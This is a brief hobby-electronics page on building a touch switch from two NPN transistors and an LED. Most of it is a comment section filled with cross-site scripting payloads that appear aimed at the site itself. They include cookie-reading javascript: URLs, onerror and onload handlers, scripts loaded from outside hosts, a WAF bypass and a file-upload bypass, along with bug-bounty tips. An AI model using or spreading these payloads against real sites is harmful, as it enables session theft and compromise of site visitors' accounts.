A simple touch switch can be created by using two NPN transistors.

Use two NPN transistors, an LED and three 1KOhm resistors. Be sure to make the connections exactly as shown in the screen-shot. When touching the two blue cables, the LED will turn on. (see attached Arduino code).

Login to post a comment...

<svg onload=alert(1)> "><img src=x onerror=alert('XS 3 months, 1 week ago

<svgonload=alert(1)> "><img src=x onerror=alert('XS
"><svg/onload"><svg/onload=alert("Friendly")>.svg "onerror="alert(1)"a=".jpg '"><svg/onload=prompt(3);>{{7*7}} ............................................................ filename="/./hey/.js?c=a.pnG%0a\" Content-Type: <html><script>alert(0)</script> 2) Visit https://lgtm-com.pentesting.semmle.net/?redirect=javascript:prompt(document.domain)%2f%2f Test<iframe src=javascript:alert(1) width=0 height=0 style=display:none;></iframe> File uploader was looking for .png, but we break it with pnG%0a - blank content type and it defaults to what it can detect in the file (sadly doesn't execute serverside code for RCE ><) #BugBounty ............................................................ Go To Your Profile Page .. And Click Edit Statement Enter Any Of These 2 Payload : ........................................................ [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) <style/onload=alert(0)> ”/>&_lt;_script>alert(1)&_lt;/scr_ipt&gt”/> <javascript:alert(document.cookie)> </textarea><script>prompt(document.cookie);</script> "><img src=x onerror=alert(4)> "><script>alert('stored xss')<%2fscript> was injected in the site_index parameter <img src="//u00f1.xyz/xss.swf"> style="width:expression(open(alert(document.cookie)))">aaa ............................................................................ ?"></script><base%20c%3D=href%3Dhttps:\mysite> - nice little bypass to Akamai WAF :) </script><base c= is the parameter, href=https:\mysite> is the parameter value (surprised it didn't pick up on </script>.. *shrug*) .................................................... https://careers.twitter.com/en/jobs-search.html?location=1"><scriptsrc=//analytics.twitter.com/tpm?tpm_cb=alert(document.domain)>// '"</Script><Html Onmouseover=(alert)(document.domain) // stored <br size="&{alert('XSS')}"> <ScRiPt src=https://yoursite.com/XSS.js > http://www.vulnerability-lab.com/resources/documents/531.txt </script><svg onload=alert()> ”/>&_lt;_script>alert(1)&_lt;/scr_ipt&gt”/> ”/>&lt;script>alert(1)&lt;/script&gt”/> .....................new xss"><!--><svg/onload=alert(document.domain)> ?return_url=javascript:alert(100)// Upload the following SVG: <svg><!--?php "--><script>confirm(20)</script>?&gt;</svg> ); alert(document.domain); if (1 <%fscripT><script>confirm(document.domain)<%2fscripT> "><svg/onload=alert(1)> <img>/><svg/onload=alert(1)> "></\/\</script><script>alert(1)</script> "><script>alert("xss");</script> <div onmouseover="alert('XSS');">Hello :) ^ [My favorite one - works like 80% of the time for me]. </style><script>a=eval;b=alert;a(b(/XSS/.source));</script>